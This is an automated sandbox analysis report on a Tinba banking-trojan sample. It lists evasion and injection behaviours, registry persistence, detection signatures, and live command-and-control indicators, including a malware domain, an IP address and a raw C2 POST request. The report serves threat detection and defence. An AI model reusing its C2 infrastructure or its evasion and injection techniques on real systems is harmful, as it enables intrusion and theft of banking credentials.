Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Uredospore8.exe

Overview

General Information

Sample name:Uredospore8.exe
Analysis ID:1501381
MD5:50c7ce412d99eb4769411d6b60a34ac6
SHA1:551d077916a61780fb055f6e3b27c0f2ba4d3378
SHA256:446156cab04d4f29ecee92429d9cba29e4403be17b677e74cde58e39e6487f20
Tags:exe
Infos:

Detection

Tinba
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Tinba Banker
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hooks files or directories query functions (used to hide files and directories)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Monitors registry run keys for changes
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • Uredospore8.exe (PID: 3212 cmdline: "C:\Users\user\Desktop\Uredospore8.exe" MD5: 50C7CE412D99EB4769411D6B60A34AC6)
    • Uredospore8.exe (PID: 364 cmdline: "C:\Users\user\Desktop\Uredospore8.exe" MD5: 50C7CE412D99EB4769411D6B60A34AC6)
      • winver.exe (PID: 616 cmdline: winver MD5: B5471B0FB5402FC318C82C994C6BF84D)
        • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • bin.exe (PID: 7064 cmdline: "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe" MD5: 73120A9C2658CFAB57CF191468A630A5)
            • bin.exe (PID: 2532 cmdline: "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe" MD5: 73120A9C2658CFAB57CF191468A630A5)
          • bin.exe (PID: 2976 cmdline: "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe" MD5: 73120A9C2658CFAB57CF191468A630A5)
        • sihost.exe (PID: 3368 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
        • svchost.exe (PID: 3396 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 3448 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • ctfmon.exe (PID: 3676 cmdline: "ctfmon.exe" MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
        • svchost.exe (PID: 3356 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • StartMenuExperienceHost.exe (PID: 4652 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
        • RuntimeBroker.exe (PID: 4840 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
        • SearchApp.exe (PID: 4964 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
        • dllhost.exe (PID: 424 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • RuntimeBroker.exe (PID: 4300 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
        • RuntimeBroker.exe (PID: 5524 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
        • smartscreen.exe (PID: 5568 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
        • ApplicationFrameHost.exe (PID: 5400 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
        • WinStore.App.exe (PID: 4028 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
        • RuntimeBroker.exe (PID: 2972 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
        • svchost.exe (PID: 3696 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • TextInputHost.exe (PID: 6588 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
        • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • backgroundTaskHost.exe (PID: 7120 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)
        • RuntimeBroker.exe (PID: 4016 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
        • TbOpfOXygan.exe (PID: 5672 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TbOpfOXygan.exe (PID: 5700 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TbOpfOXygan.exe (PID: 1372 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TbOpfOXygan.exe (PID: 3544 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TbOpfOXygan.exe (PID: 4616 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TbOpfOXygan.exe (PID: 6524 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TbOpfOXygan.exe (PID: 5720 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TbOpfOXygan.exe (PID: 3200 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TbOpfOXygan.exe (PID: 2800 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TbOpfOXygan.exe (PID: 2748 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
TinbaF-Secure notes that TinyBanker or short Tinba is usually distributed through malvertising (advertising content that leads the user to sites hosting malicious threats), exploit kits and spam email campaigns. According to news reports, Tinba has been found targeting bank customers in the United States and Europe.If Tinba successfully infects a device, it can steal banking and personal information through webinjects. To do this, the malware monitors the user's browser activity and if specific banking portals are visited, Tinba injects code to present the victim with fake web forms designed to mimic the legitimate web site. The malware then tricks them into entering their personal information, log-in credentials, etc in the legitimate-looking page.Tinba may also display socially-usered messages to lure or pressure the user into entering their information on the fake page; for example, a message may be shown which attempts to convince the victim that funds were accidentally deposited to his account and must be refunded immediately.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.tinba
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: winver.exe PID: 616JoeSecurity_TinbaYara detected Tinba BankerJoe Security
    Process Memory Space: explorer.exe PID: 4004ironshell_phpSemi-Auto-generated - file ironshell.php.txtNeo23x0 Yara BRG + customization by Stefan -dfate- Molls
    • 0xd168b:$s2: ~ Shell I
    • 0x26c61e:$s2: ~ Shell I

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: winver, ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 616, ParentProcessName: winver.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4004, ProcessName: explorer.exe
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\winver.exe, ProcessId: 616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\E6B93DA9
    Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 4004, StartAddress: 1C094C, TargetImage: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe, TargetProcessId: 7064
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: winver, ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 616, ParentProcessName: winver.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3396, ProcessName: svchost.exe
    Timestamp:2024-08-29T20:36:07.150947+0200
    SID:2020418
    Severity:1
    Source Port:49711
    Destination Port:80
    Protocol:TCP
    Classtype:Malware Command and Control Activity Detected
    Timestamp:2024-08-29T20:36:07.150947+0200
    SID:2024659
    Severity:1
    Source Port:49711
    Destination Port:80
    Protocol:TCP
    Classtype:Malware Command and Control Activity Detected
    Timestamp:2024-08-29T20:36:07.150947+0200
    SID:2830613
    Severity:1
    Source Port:49711
    Destination Port:80
    Protocol:TCP
    Classtype:Malware Command and Control Activity Detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Uredospore8.exeAvira: detected
    Source: http://lkebgoxdejyq.com/preview/Avira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeAvira: detection malicious, Label: HEUR/AGEN.1335517
    Source: Uredospore8.exeReversingLabs: Detection: 86%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeJoe Sandbox ML: detected
    Source: Uredospore8.exeJoe Sandbox ML: detected
    Source: C:\Windows\SysWOW64\winver.exeCode function: 3_2_00D42ECB CryptAcquireContextA,CryptImportPublicKeyInfo,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_00D42ECB
    Source: C:\Windows\SysWOW64\winver.exeCode function: 3_2_00D42DF8 CryptStringToBinaryA,CryptDecodeObjectEx,CryptAcquireContextA,CryptImportPublicKeyInfo,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_00D42DF8
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_02142ECB CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,30_2_02142ECB
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_02142DF8 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,30_2_02142DF8
    Source: Uredospore8.exeBinary or memory string: -----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAmKi9USd5qfAHO0EI7HVn RXX0UcpbQND9ufeTiNDdczkNZpvBWGqhwf9oPhq2VxGViSxK0b5FlXpKjlIf5w4S R2QDA7WsYcK65UQL9jl3zO52NqUXMBo0K3xEFpp3eAdJ2l73JrMRk+zcnOgXelAF A1L5nbioOBTcTNvaTqHeDTU5aeqyp/0edQ
    Source: Uredospore8.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49715 version: TLS 1.0
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TbOpfOXygan.exe, 00000024.00000002.3341937192.000000000018E000.00000002.00000001.01000000.00000008.sdmp

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2020418 - Severity 1 - ET MALWARE Tinba Checkin 2 : 192.168.2.6:49711 -> 216.218.185.162:80
    Source: Network trafficSuricata IDS: 2024659 - Severity 1 - ET MALWARE [PTsecurity] Tinba Checkin 4 : 192.168.2.6:49711 -> 216.218.185.162:80
    Source: Network trafficSuricata IDS: 2830613 - Severity 1 - ETPRO MALWARE W32/Chthonic CnC Activity : 192.168.2.6:49711 -> 216.218.185.162:80
    Source: global trafficHTTP traffic detected: POST /preview/ HTTP/1.0Host: lkebgoxdejyq.comContent-Length: 157Data Raw: 18 1a 83 d8 90 1d 83 d8 e8 5e 57 53 1e 18 82 fb 28 2a b3 e8 28 2a b3 ee Data Ascii: ^WS(*(*
    Source: Joe Sandbox ViewIP Address: 216.218.185.162 216.218.185.162
    Source: Joe Sandbox ViewASN Name: HURRICANEUS HURRICANEUS
    Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
    Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900C4F3X-BM-CBT: 1696488253X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 1D6F504B5A5A465DBDB84F31C63A581DX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900C4F3X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshldspcl40,msbdsborgv2co,msbwdsbi920cf,optfsth3,premsbdsbchtupcf,wsbfixcachec,wsbqfasmsall_c,wsbqfminiserp_c,wsbref-cX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 516Connection: Keep-AliveCache-Control: no-cacheCookie: SRCHUID=V=2&GUID=CE2BE0509FF742BD822F50D98AD10391&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&HV=1696488191&IPMH=5767d621&IPMID=1696488252989&LUT=1696487541024; CortanaAppUID=2020E25DAB158E420BA06F1C8DEF7959; MUID=81C61E09498D41CC97CDBBA354824ED1; _SS=SID=1D9FAF807E686D422B86BC217FC66C71&CPID=1696488253968&AC=1&CPH=071f2185; _EDGE_S=SID=1D9FAF807E686D422B86BC217FC66C71; MUIDB=81C61E09498D41CC97CDBBA354824ED1
    Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49715 version: TLS 1.0
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Windows\SysWOW64\winver.exeCode function: 3_2_00D43084 send,send,recv,closesocket,3_2_00D43084
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: lkebgoxdejyq.com
    Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900C4F3X-BM-CBT: 1696488253X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 1D6F504B5A5A465DBDB84F31C63A581DX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900C4F3X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshldspcl40,msbdsborgv2co,msbwdsbi920cf,optfsth3,premsbdsbchtupcf,wsbfixcachec,wsbqfasmsall_c,wsbqfminiserp_c,wsbref-cX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 516Connection: Keep-AliveCache-Control: no-cacheCookie: SRCHUID=V=2&GUID=CE2BE0509FF742BD822F50D98AD10391&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&HV=1696488191&IPMH=5767d621&IPMID=1696488252989&LUT=1696487541024; CortanaAppUID=2020E25DAB158E420BA06F1C8DEF7959; MUID=81C61E09498D41CC97CDBBA354824ED1; _SS=SID=1D9FAF807E686D422B86BC217FC66C71&CPID=1696488253968&AC=1&CPH=071f2185; _EDGE_S=SID=1D9FAF807E686D422B86BC217FC66C71; MUIDB=81C61E09498D41CC97CDBBA354824ED1
    Source: SearchApp.exe, 0000000D.00000000.2282517479.0000027A7E15E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRoot
    Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: svchost.exe, 00000007.00000002.3379362084.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FAC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3401335035.000001F69890B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222969318.000001F69890B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
    Source: SearchApp.exe, 0000000D.00000000.2282353557.0000027A7E0DB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
    Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: SearchApp.exe, 0000000D.00000000.2282353557.0000027A7E0DB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
    Source: svchost.exe, 00000007.00000002.3379362084.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FAC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3401335035.000001F69890B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222969318.000001F69890B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
    Source: SearchApp.exe, 0000000D.00000000.2282353557.0000027A7E0DB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
    Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: svchost.exe, 00000007.00000002.3379362084.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FAC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3401335035.000001F69890B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222969318.000001F69890B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
